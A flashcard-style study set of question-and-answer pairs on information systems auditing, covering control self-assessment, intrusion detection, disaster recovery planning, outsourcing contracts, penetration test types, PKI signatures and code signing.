Review

Question 1

The success of control self-assessment depends highly on:

Answer 1

line managers assuming a portion of the responsibility for control monitoring.

Question 2

The primary objective of a control self-assessment (CSA) program is to leverage the internal audit function by

Answer 2

shifting some of the control monitoring responsibilities to the functional area line managers. The success of a CSA program depends on the degree to which line managers assume responsibility for controls. This enables line managers to detect and respond to control errors promptly.

Question 3

Which of the following is MOST important for the auditor to ensure continued alignment with the enterprise’s security requirements?

Answer 3

The vendor agrees to provide annual external audit reports in the contract is correct. The only way to ensure that any potential risk is mitigated today and in the future is to include a clause within the contract that the vendor will provide future external audit reports. Without the audit clause the vendor can choose to forego future audits.

Question 4

Without a(n) ____________ clause in the contract, an agreement to implement controls does not provide assurance that controls will continue to be implemented in alignment with the enterprise

Answer 4

audit

Question 5

the purpose of using data flow diagrams

Answer 5

graphically summarize data paths and storage.

Question 6

Data flow diagrams are used as aids to graph or chart data flow and storage.

Answer 6

They trace data from their origination to destination, highlighting the paths and storage of data.

Question 7

The MOST serious challenge in the operation of an intrusion detection system is

Answer 7

filtering false positive alerts.

Question 8

Because of the configuration and the way intrusion detection system (IDS) technology operates, the main problem in operating IDSs is the recognition (detection) of events

Answer 8

that are not really security incidents—false positives, the equivalent of a false alarm. An IS auditor needs to be aware of this and should check for implementation of related controls (such as IDS tuning) and incident handling procedures (such as the screening process) to know if an event is a security incident or a false positive.

Question 9

Blocking suspicious connections is a characteristic of intrusion prevention systems, which are different type of network security systems than

Answer 9

IDS (Intrusion detection system)

Question 10

A company’s development team does not follow generally accepted system development life cycle practices. Which of the following is MOST likely to cause problems for software development projects?

Answer 10

Project responsibilities are not formally defined at the beginning of a project.

Question 11

Errors or lack of attention in the initial phases of a project may cause

Answer 11

costly errors and inefficiencies in later phases. Proper planning is required at the beginning of a project.

Question 12

Prototypes are verified

Answer 12

by users.

Question 13

User acceptance testing is seldom completely successful. If errors are not critical,

Answer 13

they may be corrected after implementation without seriously affecting usage.

Question 14

Lack of adequate program documentation, while a concern, is

Answer 14

not as big a risk as the lack of assigned responsibilities during the initial stages of the project.

Question 15

the MOST important skill that an IS auditor should develop to understand the constraints of conducting an audit?

Answer 15

Project management

Question 16

Audits often involve resource management, deliverables, scheduling and deadlines that are similar to

Answer 16

project management good practices.

Question 17

Which of the following BEST helps prioritize the recovery of IT assets when planning for a disaster?

Answer 17

Business impact analysis

Question 18

Incorporating the business impact analysis (BIA) into the IT disaster recovery planning process is critical to ensure

Answer 18

that IT assets are prioritized to align with the business.

Question 19

An incident response plan is an organized approach to addressing and managing

Answer 19

a security breach or attack.

Question 20

An incident response plan

Answer 20

defines what constitutes an incident and the process to follow when an incident occurs.

Question 21

An incident response plan

Answer 21

does NOT prioritize recovery during a disaster.

Question 22

Identifying threats and analyzing risk to the business is an important part of disaster planning, but it does NOT determine the priority of recovery.

Answer 22

determine the priority of recovery.

Question 23

The recovery time objective (RTO) is

Answer 23

the amount of time allowed for the recovery of a business function or resource after a disaster occurs.

Question 24

The recovery time objective (RTO) is

Answer 24

is included as part of the BIA and used to represent the prioritization of recovery.

Question 25

An IS auditor reviewing an outsourcing contract of IT facilities expects it to define the:

Answer 25

ownership of intellectual property.

Question 26

An outsourcing contract must specify

Answer 26

who owns the intellectual property (i.e., information being processed and application programs). Ownership of intellectual property is a significant cost and is a key aspect to be defined in an outsourcing contract.

Question 27

Stakeholders PRIMARILY responsible for reviewing and signing-off on the accuracy and completeness of the data before going live?

Answer 27

Data owner

Question 28

An IS auditor

Answer 28

should ensure that there is a review and sign-off by the data owner during the data conversion stage of the project.

Question 29

A database administrator’s primary responsibility is to

Answer 29

maintain the integrity of the database and make the database available to users. A database administrator is not responsible for reviewing migrated data.

Question 30

A project manager provides

Answer 30

day-to-day management and leadership of the project but is not responsible for the accuracy and integrity of the data.

Question 31

Senior management should

Answer 31

establish the acceptable risk level because they have the ultimate or final responsibility for the effective and efficient operation of the organization as a senior manager of the business process. The person can be the quality assurance (QA), chief information officer (CIO), or the chief security officer (CSO), but the responsibility rests with the business manager.

Question 32

Quality assurance management is

Answer 32

is concerned with reliability and consistency of processes. The QA team is not responsible for determining an acceptable risk level.

Question 33

Establishing the level of acceptable risk is the responsibility of:

Answer 33

senior business management.

Question 34

The CIO is the

Answer 34

most senior official of the enterprise who is accountable for IT advocacy; aligning IT and business strategies; and planning, resourcing and managing the delivery of IT services, information and the deployment of associated human resources. The CIO is rarely the person that determines acceptable risk levels because this could be a conflict of interest unless the CIO is the senior business process owner.

Question 35

The chief security officer is

Answer 35

responsible for enforcing the decisions of the senior management team unless the CIO is the business process manager.

Question 36

An IS auditor reviewing the process of log monitoring wants to evaluate the organization’s manual review process. Which of the following audit techniques would the auditor MOST likely employ to fulfill this purpose?

Answer 36

Walk-through

Question 37

Walk-through procedures include

Answer 37

a combination of inquiry, observation, inspection of relevant documentation and reperformance of controls. A walk-through of the manual log review process follows the manual log review process from start to finish to gain a thorough understanding of the overall process and identify potential control weaknesses.

Question 38

Inspection

Answer 38

is just one component of a walk-through and by itself does not supply enough information to provide a full understanding of the overall process and identify potential control weaknesses.

Question 39

Inquiry

Answer 39

provides only general information on how the control is executed. It does not necessarily enable the IS auditor to determine whether the control performer has an in-depth understanding of the control.

Question 40

Reperformance of the control is carried out by

Answer 40

the IS auditor and does not provide assurance of the competency of the auditee.

Question 41

An IS auditor reviewing a cloud computing environment that is managed by a third party should be MOST concerned when

Answer 41

the service level agreement does not address the responsibility of the vendor in the case of a security breach

Question 42

The ultimate purpose of IT governance is to:

Answer 42

encourage optimal use of IT.

Question 43

IT governance is intended to

Answer 43

specify the combination of decision rights and accountability that is best for the enterprise. It is different for every enterprise.

Question 44

Parallel operation is designed to

Answer 44

provide assurance that a new system meets its functional requirements. This is the safest form of system conversion testing because, if the new system fails, the old system is still available for production use. In addition, this form of testing allows the application developers and administrators to simultaneously run operational tasks (e.g., batch jobs and backups) on both systems, to ensure that the new system is reliable before unplugging the old system.

Question 45

Parallel operation provides a high level of assurance that the new system functions properly compared to the old system. Parallel operation is generally expensive and does not provide a cost savings over most other testing approaches. In many cases, parallel operation is the most

Answer 45

expensive form of system testing due to the need for dual data entry, dual sets of hardware, dual maintenance and dual backups—it is twice the amount of work as running a production system and, therefore, costs more time and money.

Question 46

The IS auditor is reviewing a recently completed conversion to a new enterprise resource planning system. In the final stage of the conversion process, the organization ran the old and new systems in parallel for 30 days before allowing the new system to run on its own. What is the MOST significant advantage to the organization by using this strategy?

Answer 46

Assurance that the new system meets functional requirements

Question 47

Parallel operation is designed to test the application’s effectiveness and integrity of application data, not

Answer 47

hardware compatibility.

Question 48

a responsibility of the chief information security officer?

Answer 48

Periodically reviewing and evaluating the security policy

Question 49

The role of the chief information security officer is to ensure that the corporate

Answer 49

security policy and controls are adequate to prevent unauthorized access to the enterprise assets, including data, programs and equipment.

Question 50

User application and other software testing and evaluation normally are the responsibility of the

Answer 50

staff assigned to development and maintenance.

Question 51

Granting and revoking user access to IT resources

Answer 51

is usually a function of system, network or database administrators.

Question 52

Approval of access to data and applications is

Answer 52

the duty of the data or application owner.

Question 53

Which type of penetration test simulates a real attack and is used to test incident handling and response capability of the target?

Answer 53

Double-blind testing

Question 54

Double-blind testing is also known as

Answer 54

zero-knowledge testing. This refers to a test where the penetration tester is not given any information and the target organization is not given any warning—both parties are “blind” to the test. This is the best scenario for testing response capability because the target will react as if the attack were real.

Question 55

Blind testing is

Answer 55

also known as black-box testing.

Question 56

Black-box testing

Answer 56

refers to a test where the penetration tester is not given any information and is forced to rely on publicly available information. This test simulates a real attack, except that the target organization is aware of the test being conducted.

Question 57

Targeted testing is

Answer 57

also known as white-box testing

Question 58

White-box testing

Answer 58

refers to a test where the penetration tester is provided with information and the target organization is also aware of the testing activities. In some cases, the tester is also provided with a limited-privilege account to be used as a starting point.

Question 59

External testing

Answer 59

refers to a test where an external penetration tester launches attacks on the target’s network perimeter from outside the target network (typically from the Internet).

Question 60

A company has decided to implement an electronic signature scheme based on a public key infrastructure. The user’s private key will be stored on the computer’s hard drive and protected by a password. The MOST significant risk of this approach is:

Answer 60

use of the user’s electronic signature by another person if the password is compromised.

Question 61

Creating a digital signature with another user’s private key would indicate that the message

Answer 61

from a different person, and therefore, the true user’s credentials would not be forged.

Question 62

Impersonation of a user by substitution of the user’s public key with another person’s public key

Answer 62

would require the modification of the certificate issued by the certificate authority. This is very difficult and least likely.

Question 63

Forgery by substitution of another person’s private key on the computer i

Answer 63

would not work because the digital signature would be validated with the original user’s public key.

Question 64

Regarding a PIN, what is the MOST important rule to be included in a security policy?

Answer 64

Users should never write down their PIN

If a user writes their PIN on a slip of paper, an individual with the token, the slip of paper, and the computer could access the corporate network. A token and the PIN is a two-factor authentication method.

Question 65

The purpose of code signing is to provide assurance that:

Answer 65

the software has not been subsequently modified.

Question 66

Code signing ensures that the executable code came from a reputable source and

Answer 66

has not been modified after being signed.

Question 67

Code signing will provide assurance of the source but will not ensure that the source is

Answer 67

trusted. The code signing will, however, ensure that the code has not been modified.